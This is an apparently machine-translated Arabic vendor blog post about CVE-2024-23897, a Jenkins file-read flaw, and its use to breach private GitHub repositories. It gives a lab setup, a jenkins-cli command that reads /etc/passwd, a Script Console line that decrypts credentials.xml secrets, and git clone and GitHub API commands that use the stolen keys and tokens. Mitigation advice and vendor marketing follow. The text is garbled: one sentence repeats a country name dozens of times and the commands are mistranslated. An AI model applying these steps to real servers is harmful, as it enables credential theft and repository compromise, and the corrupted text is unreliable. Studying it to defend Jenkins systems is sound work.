🚀 لقد رفعت CloudSek جولة B1 من السلسلة B1 بقيمة 19 مليون دولار - تعزيز مستقبل الأمن السيبراني التنبؤي
اقرأ المزيد
توضح هذه المدونة بالتفصيل كيف تم استغلال CVE-2024-23897، وهي ثغرة أمنية في تضمين الملفات المحلية (LFI) في جينكينز، لاختراق مستودعات Github. تمكن المهاجمون من الوصول إلى الملفات الحساسة وفك تشفير بيانات الاعتماد واستخدامها للتسلل إلى المستودعات الخاصة. تؤكد المقالة على الحاجة إلى التصحيح في الوقت المناسب والمصادقة القوية والتدقيق الأمني المنتظم للتخفيف من مثل هذه التهديدات.
هل تعلم أن ٧٠٪ من الموارد، المملكة العربية السعودية، المملكة العربية السعودية، المملكة العربية السعودية، المملكة العربية السعودية، المملكة العربية السعودية، المملكة العربية السعودية، المملكة العربية السعودية، المملكة العربية السعودية، المملكة العربية السعودية، المملكة العربية السعودية، المملكة العربية السعودية، المملكة العربية السعودية، المملكة العربية السعودية، المملكة العربية السعودية، المملكة العربية السعودية، المملكة العربية السعودية، المملكة العربية السعودية، المملكة العربية السعودية، المملكة العربية السعودية، المملكة العربية السعودية، المملكة العربية السعودية، المملكة العربية السعودية، المملكة العربية السعودية، المملكة العربية السعودية، المملكة العربية السعودية، المملكة العربية السعودية، المملكة العربية السعودية، المملكة العربية السعودية، المملكة العربية السعودية، المملكة العربية السعودية.
Schedule a Demoالفئة: استخبارات العدو
المنطقة: عالمية
التاريخ: 24 يوليو 2024
الجزء العلوي: أخضر
تتعمق هذه المقالة في التعقيدات التقنية لـ CVE-2024-23897، وهي ثغرة أمنية غير مصادق عليها لتضمين الملفات المحلية (LFI) في جينكينز، وتستعرض كيفية قيام الجهات الفاعلة في مجال التهديد بالاستفادة منها لاختراق مستودعات Github الخاصة بالشركة.
تبدأ قصتنا بخادم Jenkins الذي يبدو غير ضار، وهو حجر الزاوية في خطوط أنابيب التكامل والنشر المستمر. لسوء الحظ، أصبحت هذه الحالة بالذات، التي تعمل بإصدار ضعيف (Jenkins 2.441 والإصدارات السابقة، LTS 2.426.2 والإصدارات السابقة)، هدفًا للنوايا الخبيثة للجهات الفاعلة في مجال التهديد مؤخرًا.
لفهم الهجوم، دعنا أولاً ننشئ بيئة ضعيفة مماثلة باستخدام Docker:
1. اسحب صورة Docker باستخدام الأمر:
دوكر بول جينكينز/جينكينز: 2.440-jdk17
2. قم بتشغيل الحاوية:
دوكر ران -د --اسم جينكينز -p 8080:8080 -p 50000:50000 -v/المسار/إلى/لك/المحلية/جينكينز/المنزل: /var/jenkins_home جينكينز/جينكينز:2.440-jdk17
يقوم هذا الأمر بتشغيل حاوية Jenkins، وتعيين المنافذ 8080 و 50000 إلى الجهاز المضيف وتركيب دليل محلي إلى دليل /var/jenkins_home الخاص بالحاوية.
3. الوصول إلى غلاف الحاوية:
دوكر إكسيك -إت <container_name>/بين/باش
مع إعداد المسرح، دعونا نستكشف كيف تستغل الجهات الفاعلة في مجال التهديد الثغرة الأمنية.
CVE-2024-23897 هي ثغرة LFI غير مصدقة تسمح للمهاجمين بقراءة الملفات التعسفية على خادم Jenkins. تنشأ هذه الثغرة الأمنية من التحقق غير الصحيح من صحة الإدخال، مما يمكّن المهاجمين من التلاعب بمعلمات محددة وخداع الخادم للوصول إلى محتويات الملفات الحساسة وعرضها.
credentials.xml
الملف، الذي يخزن بيانات الاعتماد المشفرة المستخدمة في عمليات التكامل المختلفةcredentials.xml
ملف، والحصول على إمكانية الوصول إلى مفاتيح Github SSH ورموز الوصول
دعونا نتعمق في التفاصيل الفنية لكيفية استغلال IntelBroker لـ LFI واستخراج بيانات اعتماد Github:
من المحتمل أن تستخدم IntelBroker أداة Jenkins CLI جنبًا إلى جنب مع ثغرة LFI لقراءة محتويات الملفات الحساسة. على سبيل المثال، لقراءة /وما إلى ذلك/تم تمريره
ملف:
جافا -jar jenkins-cli.jar -s http://target-jenkins-server:8080/ -المصادقة @password .txt الإصدار @/etc/passwd
من خلال معالجة الرمز @، يمكنهم خداع الخادم لتفسير المسار بعده كملف لتضمينه.
ملاحظة: تتوفر أيضًا نصوص POC الخاصة بـ CVE-2024-23897 على جيثب.
من المحتمل أن تكون IntelBroker قد تخلت عن credentials.xml باستخدام POC أدناه أو برنامج نصي من github، للحصول على بيانات الاعتماد المشفرة المخزنة. مسار النظام للملف الجاري /var/jenkins_home/credentials.xml
credentials.xml
ملف:يقوم Jenkins بتخزين جميع بيانات الاعتماد العالمية في شكل مشفر في هذا الملف. يمكن فك تشفير الهاش المخزن باستخدام Hudson.util.secret.decrypt ()
.
بمجرد أن تمكنوا من الوصول إلى credentials.xml
ملف، يستخدم ممثلو التهديد وحدة تحكم Jenkins Script والأمر التالي لفك تشفير بيانات الاعتماد المشفرة:
println (Hudson.util.secret.from String («{XXX=}»). getPlainText ())
استبدال {XXX=}
مع السلسلة المشفرة من credentials.xml
سمح لهم الملف باسترداد بيانات اعتماد Github ذات النص العادي.
باستخدام مفاتيح SSH المسروقة ورموز الوصول، يمكن للجهات الفاعلة في مجال التهديد:
باستخدام الأمر git clone مع مفتاح SSH المسروق المضاف إلى وكيل SSH الخاص بهم أو عن طريق تضمين رمز الوصول مباشرة في عنوان URL:
git clone [email protected]: اسم المستخدم المستهدف/private-repo.git
ملاحظة:
باستخدام رمز الوصول المسروق في عنوان التخويل، يمكنهم التفاعل مع Github API لإدراج المستودعات وتنزيلها:
curl -H «التفويض: الرمز المميز github_access_token» https://api.github.com/user/repos
يعد الاختراق الناجح لـ IntelBroker بمثابة تذكير صارخ بأهمية الوعي بالأمن السيبراني والتدابير الأمنية الاستباقية. فيما يلي بعض النقاط الرئيسية واستراتيجيات التخفيف:
من خلال فهم تعقيدات CVE-2024-23897 وتنفيذ ممارسات أمنية قوية، يمكن للمؤسسات حماية نفسها بشكل أفضل ضد مثل هذه الهجمات المعقدة.
على مدى الأشهر الأخيرة، واجهت الولايات المتحدة زيادة في الهجمات الإلكترونية، مع ارتفاع حوادث برامج الفدية بشكل حاد من يونيو إلى أكتوبر 2024. استهدفت المجموعات البارزة، بما في ذلك Play و RansomHub و Lockbit و Qilin و Meow، قطاعات مثل خدمات الأعمال والتصنيع وتكنولوجيا المعلومات والرعاية الصحية، مما يعرض أكثر من 800 منظمة للخطر. تضمنت الهجمات الرئيسية خرقًا لمدينة كولومبوس بواسطة Rhysida ransomware وتسريبات البيانات التي تؤثر على إدارة الانتخابات في فرجينيا و Healthcare.gov. بالإضافة إلى ذلك، تستهدف حملة التجسس الصينية «سولت تايفون» بقوة مزودي خدمات الإنترنت في الولايات المتحدة، مما يزيد من تعقيد مشهد التهديدات الإلكترونية. كما زادت مجموعات الهاكتيفيست التي تدافع عن المواقف المؤيدة لروسيا والمؤيدة للفلسطينيين من هجماتها، مما أثر على الكيانات الحكومية والبنية التحتية الحيوية. يسلط هذا التقرير الضوء على الحاجة إلى بروتوكولات أمنية محسنة وعمليات تدقيق منتظمة ومبادرات توعية عامة للتخفيف من المخاطر السيبرانية المتزايدة. تشمل التوصيات الرئيسية تنفيذ المصادقة متعددة العوامل، والتدريب المتكرر للموظفين، ومراقبة التهديدات المتقدمة لحماية البنية التحتية الحيوية للدولة وثقة الجمهور.
كيف تكتشف الجهات الفاعلة في مجال التهديد نقاط الضعف وتستغلها في البرية؟
CVE 2023-20887 was discovered in the VMware Aria Operations with a CVSS score of 9.8 which leads to VMware Aria.
Take action now
CloudSEK Platform is a no-code platform that powers our products with predictive threat analytic capabilities.
Digital Risk Protection platform which gives Initial Attack Vector Protection for employees and customers.
Software and Supply chain Monitoring providing Initial Attack Vector Protection for Software Supply Chain risks.
Creates a blueprint of an organization's external attack surface including the core infrastructure and the software components.
Instant Security Score for any Android Mobile App on your phone. Search for any app to get an instant risk score.